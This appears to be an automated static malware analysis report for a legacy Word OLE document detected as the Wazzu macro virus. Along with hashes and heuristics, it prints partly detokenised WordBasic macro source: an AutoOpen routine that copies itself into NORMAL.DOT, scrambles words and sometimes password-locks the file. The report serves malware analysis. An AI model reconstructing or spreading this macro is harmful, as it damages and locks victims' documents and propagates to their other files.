Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4dc9da33b5bb6f56…

MALICIOUS

Office (OLE)

7.0 KB First seen: 2012-06-14
MD5: e83c40bd4e9bf155462bd8d2cbff524f SHA-1: f3afb69d67d9dc2bebedfd3f3844406c47bec22e SHA-256: 4dc9da33b5bb6f564595084bacf15c7f72067fe8e2864dea3beff866a0be5435
102 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits legacy WordBasic macro virus markers, specifically 'RSN MACRO VIRUS', and includes embedded text that appears to be part of a macro designed to manipulate document content and potentially password-protect the file. The presence of these markers and the nature of the embedded text strongly suggest a malicious macro-based document.

Heuristics 3

  • ClamAV: Doc.Trojan.Wazzu-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Wazzu-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 1152 bytes
SHA-256: 20ef829dd9cff6f481fade64247d378f4f7e5d9a8d20ab44847e2fc260daa80b
Preview script
First 1,000 lines of the extracted script
8300   ,  
    10272 25199 8233 29793  
      24933 8300
MAIN
Naproxen
REM  Macro inserts words or moves random words based on random generated 
REM  number. If you're really lucky, it'll password save the file.
REM *********************************************************************
REM *********************************************************************
Naproxen
@cmd806f 1
, - * errCaught
@cmd0056
dlg @cmd0056
dlg
fileMacro$ = dlg = "\" = dlg @cmd0700 ":autoOpen"
globMacro$ = "Global:autoOpen"
MacroFile$ = @cmd80af @cmd8009 @cmd818e @cmd80b8 0 , 10
MacroFile$ = "NORMAL.DOT"
@cmd80c2 globMacro$ , fileMacro$
@cmd0054 = 1
@cmd80c2 fileMacro$ , globMacro$
Nuku = @cmd8002 @cmd800e 100
Nuku 0
Rndword
Nuku = 0
LockIt
* bye @cmd7468
, - * 0
RndWord
@cmd8111 0
@cmd0056
dlg @cmd004e
dlg
GMTE1 = @cmd8002 @cmd800e @cmd8006 dlg
GMTE2 = @cmd8002 @cmd800e @cmd8006 dlg
@cmdc010
@cmdc003 GMTE1
@cmd8116
@cmd0012
@cmdc003 GMTE2
@cmd0047
@cmdc010
@cmd8111 1
@cmd0299
LockIt
@cmd8111 0
@cmd0056
dlg @cmd004e
dlg
@cmd8006 dlg 150
@cmd00d1 = 0 , = 1 , = 0 , = 0 , = 0 , = 0 , = 0 , = 1 , = "10" , = "HI" , = , = 0
@cmd0053
@cmdc010
@cmd8111 1
@cmd0299

Open this report in the interactive analyzer, or submit your own file for analysis.